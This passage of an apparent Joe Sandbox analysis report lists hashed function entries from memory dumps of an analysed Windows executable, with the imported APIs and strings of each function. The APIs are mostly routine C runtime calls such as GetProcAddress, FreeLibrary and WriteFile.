                                                                    • Instruction ID: fd81b379ff4992bf613f79005a27ede380d2d1e31e4daf91d48ccd6d522b57e6
                                                                    • Opcode Fuzzy Hash: 7fb3fbb3ca2ac507b0747a3a3d3554258d5ace5a288527db04dd042f0f60e3c9
                                                                    • Instruction Fuzzy Hash: 9AF139B550C3918FD3048F24D49136BBBE1AF96308F18887EE5C587382D779D90ACB9A
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.2026698409.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_file.jbxd
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID: _^]\
                                                                    • API String ID: 2994545307-3116432788
                                                                    • Opcode ID: 6d31a6132db982790f1bde5139b1100403c59add5166155f086b98d47ca5c3dc
                                                                    • Instruction ID: 91144feaa9fc6f6c9e4b926c482b4b0bc879a10df7574644f90e1e620fd44459
                                                                    • Opcode Fuzzy Hash: 6d31a6132db982790f1bde5139b1100403c59add5166155f086b98d47ca5c3dc
                                                                    • Instruction Fuzzy Hash: 8C81D0346083418BE718DF18D490A2BB7F1FF99710F05856DE9859B364E734EC91CB8A
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.2026698409.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_file.jbxd
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID: 5|iL
                                                                    • API String ID: 2994545307-1880071150
                                                                    • Opcode ID: 15748e0e8b40cced74bc07917236e402747521d5de867efe9ea67fe5f28c6c5c
                                                                    • Instruction ID: 802ce28fd04fc2f5bd729f7f4bd0fc546bf032d51cf96316bbb3843ff7b699f8
                                                                    • Opcode Fuzzy Hash: 15748e0e8b40cced74bc07917236e402747521d5de867efe9ea67fe5f28c6c5c
                                                                    • Instruction Fuzzy Hash: AB71FA36B047108BC7149F2C8C80767B7A6EBC9324F15A66EEAA4DB365C775DC028BC5
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.2026698409.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_file.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: D
                                                                    • API String ID: 0-2746444292
                                                                    • Opcode ID: b2ed4e45026cbbbd55ed16fe12c951ea5c2f741830c1b1cd59a57fb95d9f28d6
                                                                    • Instruction ID: b768361b178031b247dea6d1c575d4c8eb830ee5863a17f0432992a31c0fd595
                                                                    • Opcode Fuzzy Hash: b2ed4e45026cbbbd55ed16fe12c951ea5c2f741830c1b1cd59a57fb95d9f28d6
                                                                    • Instruction Fuzzy Hash: 145100B05493809AE720CF16C86175BBBF1FB92744F20981CE6D51B394D7B99849CF87
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.2026698409.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_file.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: b530ae30669dfc10addbe003a4c6b76f2eb95279c2c9ee58aff2161a7d1c7b54
                                                                    • Instruction ID: d0b954aed4f796411785180baa8ced4f0e63ee4f94f244d62a8f27c5611ddeae
                                                                    • Opcode Fuzzy Hash: b530ae30669dfc10addbe003a4c6b76f2eb95279c2c9ee58aff2161a7d1c7b54
                                                                    • Instruction Fuzzy Hash: 4042F236E44215CFDB08CF68D8916AEB7F2FB8E310F1A857DC946A7391C6389915CB84
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.2026698409.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_file.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: a9e56e85d3793a0f4e761ff8f8362607d8bf849bd197acd1c0af18c6b7dbfe6d
                                                                    • Instruction ID: d50be91011134d3f54a3e2db29f698b36bda3f8b9bbbc03dcf1bb639a28d40f2
                                                                    • Opcode Fuzzy Hash: a9e56e85d3793a0f4e761ff8f8362607d8bf849bd197acd1c0af18c6b7dbfe6d
                                                                    • Instruction Fuzzy Hash: 4542AF31A0C3118BC725DF28E88066BB3E2BFD4314F25893ED995A7385D739A855CB87
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.2026698409.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_file.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 21a1d6e3d5ba60b3bd1d97c05962dbaf1adc3ce7802fd18f61ea84a3f4fb9068
                                                                    • Instruction ID: b1d29b5d4b1c35b0e31dc0ce13bb5c519f35e0eb22e22dceb78cb20d493a081f
                                                                    • Opcode Fuzzy Hash: 21a1d6e3d5ba60b3bd1d97c05962dbaf1adc3ce7802fd18f61ea84a3f4fb9068
                                                                    • Instruction Fuzzy Hash: 56F1AC712087418FC724CF29C881A2BFBE2FF95304F44492EE4D697791E639E944CB9A
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.2026698409.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_file.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: f0cd06d0c460137d603e80f6f3d8983a298fc10b1a175a93c8f847950acd8102
                                                                    • Instruction ID: c0129cb8722ff713d90eb3b65e812c21d2aeb054e04a62e4d84559ed6a3f55ec
                                                                    • Opcode Fuzzy Hash: f0cd06d0c460137d603e80f6f3d8983a298fc10b1a175a93c8f847950acd8102
                                                                    • Instruction Fuzzy Hash: 89F082B5A183815BD7189B24D89563FB7A1EB87614F10552DE2C2D2292DB25D8068A0D
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.2026698409.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_file.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: e37c34810d76ac32ed1e3c693d6fe2006ff27c0c8d8d7da8e10277fe1322ecdb
                                                                    • Instruction ID: 34fde4c13fcfd63171c7d53dbec0e996951c7845071132db72e9b575714ea7da
                                                                    • Opcode Fuzzy Hash: e37c34810d76ac32ed1e3c693d6fe2006ff27c0c8d8d7da8e10277fe1322ecdb
                                                                    • Instruction Fuzzy Hash: 90B01254B142087F0064AE0E8C45D7BF7FED2CB650F107018B408A3314C650EC0482FD
                                                                    APIs
                                                                    • GetModuleHandleW.KERNEL32(kernel32.dll), ref: 000B9CD6
                                                                    • GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 000B9CE4
                                                                    • GetProcAddress.KERNEL32(00000000,FlsFree), ref: 000B9CF5
                                                                    • GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 000B9D06
                                                                    • GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 000B9D17
                                                                    • GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 000B9D28
                                                                    • GetProcAddress.KERNEL32(00000000,InitOnceExecuteOnce), ref: 000B9D39
                                                                    • GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 000B9D4A
                                                                    • GetProcAddress.KERNEL32(00000000,CreateSemaphoreW), ref: 000B9D5B
                                                                    • GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 000B9D6C
                                                                    • GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 000B9D7D
                                                                    • GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 000B9D8E
                                                                    • GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 000B9D9F
                                                                    • GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 000B9DB0
                                                                    • GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 000B9DC1
                                                                    • GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 000B9DD2
                                                                    • GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 000B9DE3
                                                                    • GetProcAddress.KERNEL32(00000000,FlushProcessWriteBuffers), ref: 000B9DF4
                                                                    • GetProcAddress.KERNEL32(00000000,FreeLibraryWhenCallbackReturns), ref: 000B9E05
                                                                    • GetProcAddress.KERNEL32(00000000,GetCurrentProcessorNumber), ref: 000B9E16
                                                                    • GetProcAddress.KERNEL32(00000000,CreateSymbolicLinkW), ref: 000B9E27
                                                                    • GetProcAddress.KERNEL32(00000000,GetCurrentPackageId), ref: 000B9E38
                                                                    • GetProcAddress.KERNEL32(00000000,GetTickCount64), ref: 000B9E49
                                                                    • GetProcAddress.KERNEL32(00000000,GetFileInformationByHandleEx), ref: 000B9E5A
                                                                    • GetProcAddress.KERNEL32(00000000,SetFileInformationByHandle), ref: 000B9E6B
                                                                    • GetProcAddress.KERNEL32(00000000,GetSystemTimePreciseAsFileTime), ref: 000B9E7C
                                                                    • GetProcAddress.KERNEL32(00000000,InitializeConditionVariable), ref: 000B9E8D
                                                                    • GetProcAddress.KERNEL32(00000000,WakeConditionVariable), ref: 000B9E9E
                                                                    • GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 000B9EAF
                                                                    • GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 000B9EC0
                                                                    • GetProcAddress.KERNEL32(00000000,InitializeSRWLock), ref: 000B9ED1
                                                                    • GetProcAddress.KERNEL32(00000000,AcquireSRWLockExclusive), ref: 000B9EE2
                                                                    • GetProcAddress.KERNEL32(00000000,TryAcquireSRWLockExclusive), ref: 000B9EF3
                                                                    • GetProcAddress.KERNEL32(00000000,ReleaseSRWLockExclusive), ref: 000B9F04
                                                                    • GetProcAddress.KERNEL32(00000000,SleepConditionVariableSRW), ref: 000B9F15
                                                                    • GetProcAddress.KERNEL32(00000000,CreateThreadpoolWork), ref: 000B9F26
                                                                    • GetProcAddress.KERNEL32(00000000,SubmitThreadpoolWork), ref: 000B9F37
                                                                    • GetProcAddress.KERNEL32(00000000,CloseThreadpoolWork), ref: 000B9F48
                                                                    • GetProcAddress.KERNEL32(00000000,CompareStringEx), ref: 000B9F59
                                                                    • GetProcAddress.KERNEL32(00000000,GetLocaleInfoEx), ref: 000B9F6A
                                                                    • GetProcAddress.KERNEL32(00000000,LCMapStringEx), ref: 000B9F7B
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.2026614679.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                                                    • Associated: 00000002.00000002.2026598764.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.2026634139.00000000000C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.2026648015.00000000000D0000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.2026660121.00000000000D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.2026672376.00000000000D6000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_a0000_file.jbxd
                                                                    Similarity
                                                                    • API ID: AddressProc$HandleModule
                                                                    • String ID: AcquireSRWLockExclusive$CloseThreadpoolTimer$CloseThreadpoolWait$CloseThreadpoolWork$CompareStringEx$CreateEventExW$CreateSemaphoreExW$CreateSemaphoreW$CreateSymbolicLinkW$CreateThreadpoolTimer$CreateThreadpoolWait$CreateThreadpoolWork$FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$FlushProcessWriteBuffers$FreeLibraryWhenCallbackReturns$GetCurrentPackageId$GetCurrentProcessorNumber$GetFileInformationByHandleEx$GetLocaleInfoEx$GetSystemTimePreciseAsFileTime$GetTickCount64$InitOnceExecuteOnce$InitializeConditionVariable$InitializeCriticalSectionEx$InitializeSRWLock$LCMapStringEx$ReleaseSRWLockExclusive$SetFileInformationByHandle$SetThreadpoolTimer$SetThreadpoolWait$SleepConditionVariableCS$SleepConditionVariableSRW$SubmitThreadpoolWork$TryAcquireSRWLockExclusive$WaitForThreadpoolTimerCallbacks$WakeAllConditionVariable$WakeConditionVariable$kernel32.dll
                                                                    • API String ID: 667068680-295688737
                                                                    • Opcode ID: 8167c24c59a5484d09fbbcc16190b6714cd9aa6d9b7b9fc6ae51c54a54370ff7
                                                                    • Instruction ID: 296cfeae27023ef79d067957bbc4f5c537883f6e2cbabe7f44f5bc49c87619e9
                                                                    • Opcode Fuzzy Hash: 8167c24c59a5484d09fbbcc16190b6714cd9aa6d9b7b9fc6ae51c54a54370ff7
                                                                    • Instruction Fuzzy Hash: 5161EE71993390BBB704AFF5ED5AEDA3BA8AB0D702700052BB60197161DFBC51819B74
                                                                    APIs
                                                                    • type_info::operator==.LIBVCRUNTIME ref: 000BE212
                                                                    • ___TypeMatch.LIBVCRUNTIME ref: 000BE320
                                                                    • CatchIt.LIBVCRUNTIME ref: 000BE371
                                                                    • _UnwindNestedFrames.LIBCMT ref: 000BE472
                                                                    • CallUnexpected.LIBVCRUNTIME ref: 000BE48D
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.2026614679.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                                                    • Associated: 00000002.00000002.2026598764.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.2026634139.00000000000C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.2026648015.00000000000D0000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.2026660121.00000000000D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.2026672376.00000000000D6000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_a0000_file.jbxd
                                                                    Similarity
                                                                    • API ID: CallCatchFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
                                                                    • String ID: csm$csm$csm
                                                                    • API String ID: 4119006552-393685449
                                                                    • Opcode ID: 4b8fca3ad8186ed9285622606df6b8c6cf4bc493a162f795b96efc1392db4c8f
                                                                    • Instruction ID: 556ef9f3be1111243183ee61861e58eaaeb20def416a7eb945f2647241ba6b21
                                                                    • Opcode Fuzzy Hash: 4b8fca3ad8186ed9285622606df6b8c6cf4bc493a162f795b96efc1392db4c8f
                                                                    • Instruction Fuzzy Hash: 3DB16675C00259EFCF29DFA4C8859EEBBB9FF18310B14416AE8116B212D734EA51CF92
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.2026614679.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                                                    • Associated: 00000002.00000002.2026598764.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.2026634139.00000000000C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.2026648015.00000000000D0000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.2026660121.00000000000D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.2026672376.00000000000D6000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_a0000_file.jbxd
                                                                    Similarity
                                                                    • API ID: __freea$__alloca_probe_16$Info
                                                                    • String ID:
                                                                    • API String ID: 127012223-0
                                                                    • Opcode ID: 037472aff2b640ef2d5945b2443f30fbbfce33e39a1e1c4d3beec9e3b4cb8907
                                                                    • Instruction ID: bd8fbcc1bbc17a1fadfa9f9d1a04fd6ebe8b8a76284bcf3133f93e3bc6a02fcd
                                                                    • Opcode Fuzzy Hash: 037472aff2b640ef2d5945b2443f30fbbfce33e39a1e1c4d3beec9e3b4cb8907
                                                                    • Instruction Fuzzy Hash: 2D71E67A900E45ABDF209F548C91FEE77EA9F48356F28001DE915A7282E775EDC0C7A0
                                                                    APIs
                                                                    • FreeLibrary.KERNEL32(00000000,?,000BEF02,?,?,00000000,00000000,?,?,000BEC0B,00000022,FlsSetValue,000C8DDC,000C8DE4,00000000), ref: 000BEEB4
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.2026614679.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                                                    • Associated: 00000002.00000002.2026598764.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.2026634139.00000000000C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.2026648015.00000000000D0000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.2026660121.00000000000D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.2026672376.00000000000D6000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_a0000_file.jbxd
                                                                    Similarity
                                                                    • API ID: FreeLibrary
                                                                    • String ID: api-ms-$ext-ms-
                                                                    • API String ID: 3664257935-537541572
                                                                    • Opcode ID: 9d3f69c1b82c33ecf47b85e70cca97b18222e59bb337a783388b55faf7aaf516
                                                                    • Instruction ID: 41065397bc01bb1aac882ee5d762f3d06de099040836a1d534ef3e1b8d6f6154
                                                                    • Opcode Fuzzy Hash: 9d3f69c1b82c33ecf47b85e70cca97b18222e59bb337a783388b55faf7aaf516
                                                                    • Instruction Fuzzy Hash: A4210331A01291ABDB219B60DC85FDE37A9AF417B0F250125FD26AB2D1DB34ED01C6E0
                                                                    APIs
                                                                    • GetLastError.KERNEL32(?,?,000BD851,000BAF2D,000BA5C4), ref: 000BD868
                                                                    • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 000BD876
                                                                    • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 000BD88F
                                                                    • SetLastError.KERNEL32(00000000,000BD851,000BAF2D,000BA5C4), ref: 000BD8E1
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.2026614679.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                                                    • Associated: 00000002.00000002.2026598764.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.2026634139.00000000000C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.2026648015.00000000000D0000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.2026660121.00000000000D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.2026672376.00000000000D6000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_a0000_file.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorLastValue___vcrt_
                                                                    • String ID:
                                                                    • API String ID: 3852720340-0
                                                                    • Opcode ID: aaf8bd32c7d9ec77a554abdc1e30615bfd2f0cfaa39b0a1a8e7f27f2db428df0
                                                                    • Instruction ID: 8105a49e10bd8e5bf9eba3fe90fc8217e3dbb08d830a2be52d0f6901d65f6daf
                                                                    • Opcode Fuzzy Hash: aaf8bd32c7d9ec77a554abdc1e30615bfd2f0cfaa39b0a1a8e7f27f2db428df0
                                                                    • Instruction Fuzzy Hash: 5301B13621A7115EF6642BB8BC86AEE6B84EB427B6B24023FF414550E2FF158C50A250
                                                                    APIs
                                                                    • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,BB40E64E,?,?,00000000,000C760B,000000FF,?,000BC035,?,?,000BC0D1,00000000), ref: 000BBFA9
                                                                    • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 000BBFBB
                                                                    • FreeLibrary.KERNEL32(00000000,?,00000000,000C760B,000000FF,?,000BC035,?,?,000BC0D1,00000000), ref: 000BBFDD
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.2026614679.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                                                    • Associated: 00000002.00000002.2026598764.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.2026634139.00000000000C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.2026648015.00000000000D0000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.2026660121.00000000000D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.2026672376.00000000000D6000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_a0000_file.jbxd
                                                                    Similarity
                                                                    • API ID: AddressFreeHandleLibraryModuleProc
                                                                    • String ID: CorExitProcess$mscoree.dll
                                                                    • API String ID: 4061214504-1276376045
                                                                    • Opcode ID: c73d7042ccc61532f9a12f7d49798426b6958b7bd0fe4e3b9cffa485b6834472
                                                                    • Instruction ID: fa453b98090d994d582c0f9d432feae15b393c203dfebff7821c6885f7612773
                                                                    • Opcode Fuzzy Hash: c73d7042ccc61532f9a12f7d49798426b6958b7bd0fe4e3b9cffa485b6834472
                                                                    • Instruction Fuzzy Hash: 22018631A4465AAFEB158F54DC09FBEBBB8FB04B14F044639F811A26D0DBB89900CF94
                                                                    APIs
                                                                    • __alloca_probe_16.LIBCMT ref: 000C2FC2
                                                                    • __alloca_probe_16.LIBCMT ref: 000C308B
                                                                    • __freea.LIBCMT ref: 000C30F2
                                                                      • Part of subcall function 000C0C65: HeapAlloc.KERNEL32(00000000,?,-A3400188,?,000B9200,?,?,000B67E7,?,000B6199), ref: 000C0C97
                                                                    • __freea.LIBCMT ref: 000C3105
                                                                    • __freea.LIBCMT ref: 000C3112
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.2026614679.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                                                    • Associated: 00000002.00000002.2026598764.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.2026634139.00000000000C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.2026648015.00000000000D0000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.2026660121.00000000000D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.2026672376.00000000000D6000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_a0000_file.jbxd
                                                                    Similarity
                                                                    • API ID: __freea$__alloca_probe_16$AllocHeap
                                                                    • String ID:
                                                                    • API String ID: 1096550386-0
                                                                    • Opcode ID: d8a0cb6c140654e58966ca95b0784aba2ef315ce482b26dd06ee75d97bf425f1
                                                                    • Instruction ID: aeffb85912d4e4a95a14ccba54178ee1ff0f69c5c013868d9d50820bd1ff7bc0
                                                                    • Opcode Fuzzy Hash: d8a0cb6c140654e58966ca95b0784aba2ef315ce482b26dd06ee75d97bf425f1
                                                                    • Instruction Fuzzy Hash: 4B51BF72610206AFEB249F65CC86FEF7AE9EF44710F29412DFD04D6152EA31DE50DAA0
                                                                    APIs
                                                                    • EncodePointer.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,?,000BE41E,?,?,00000000,00000000,00000000,?), ref: 000BE53D
                                                                    • CatchIt.LIBVCRUNTIME ref: 000BE623
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.2026614679.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                                                    • Associated: 00000002.00000002.2026598764.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.2026634139.00000000000C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.2026648015.00000000000D0000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.2026660121.00000000000D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.2026672376.00000000000D6000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_a0000_file.jbxd
                                                                    Similarity
                                                                    • API ID: CatchEncodePointer
                                                                    • String ID: MOC$RCC
                                                                    • API String ID: 1435073870-2084237596
                                                                    • Opcode ID: 3f961950f16236778583489dbcd0b8112dfc40e127ac4ae83f86df4ee7d493fc
                                                                    • Instruction ID: 6e69c17c80cc26e5566d7a9cfab12cbe67320cb5379c4a83ba5f27586ae5bcc0
                                                                    • Opcode Fuzzy Hash: 3f961950f16236778583489dbcd0b8112dfc40e127ac4ae83f86df4ee7d493fc
                                                                    • Instruction Fuzzy Hash: 31417A75900249AFCF26CF98CD81AEEBBB5FF48304F188059FA05A7252E735AA50DB51
                                                                    APIs
                                                                    • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,000C2D1A,00000000,?,000D1CD0,?,?,?,000C2C51,00000004,InitializeCriticalSectionEx,000C96F8,000C9700), ref: 000C2C8B
                                                                    • GetLastError.KERNEL32(?,000C2D1A,00000000,?,000D1CD0,?,?,?,000C2C51,00000004,InitializeCriticalSectionEx,000C96F8,000C9700,00000000,?,000BE73C), ref: 000C2C95
                                                                    • LoadLibraryExW.KERNEL32(00000000,00000000,00000000), ref: 000C2CBD
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.2026614679.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                                                    • Associated: 00000002.00000002.2026598764.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.2026634139.00000000000C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.2026648015.00000000000D0000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.2026660121.00000000000D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.2026672376.00000000000D6000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_a0000_file.jbxd
                                                                    Similarity
                                                                    • API ID: LibraryLoad$ErrorLast
                                                                    • String ID: api-ms-
                                                                    • API String ID: 3177248105-2084034818
                                                                    • Opcode ID: e57341b12df43af15086a996a352ce3333b16d6921555bd18bfb36e54ecf0d02
                                                                    • Instruction ID: 7e9723e3eade129ecb3c3e4e629d42dd36df26fcb393ff993ae5c384aa9d1851
                                                                    • Opcode Fuzzy Hash: e57341b12df43af15086a996a352ce3333b16d6921555bd18bfb36e54ecf0d02
                                                                    • Instruction Fuzzy Hash: 9FE04F30680245BBEF501B60ED4AF5C3E99AB00BA5F144435F90DA85E1E765A810D655
                                                                    APIs
                                                                    • GetConsoleOutputCP.KERNEL32(BB40E64E,00000000,00000000,?), ref: 000C366B
                                                                      • Part of subcall function 000C2151: WideCharToMultiByte.KERNEL32(?,00000000,?,00000000,00000000,00000000,000000FF,?,?,00000000,?,?,000BD7D1,?,00000000,?), ref: 000C21B2
                                                                    • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 000C38BD
                                                                    • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 000C3903
                                                                    • GetLastError.KERNEL32 ref: 000C39A6
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.2026614679.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                                                    • Associated: 00000002.00000002.2026598764.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.2026634139.00000000000C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.2026648015.00000000000D0000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.2026660121.00000000000D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.2026672376.00000000000D6000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_a0000_file.jbxd
                                                                    Similarity
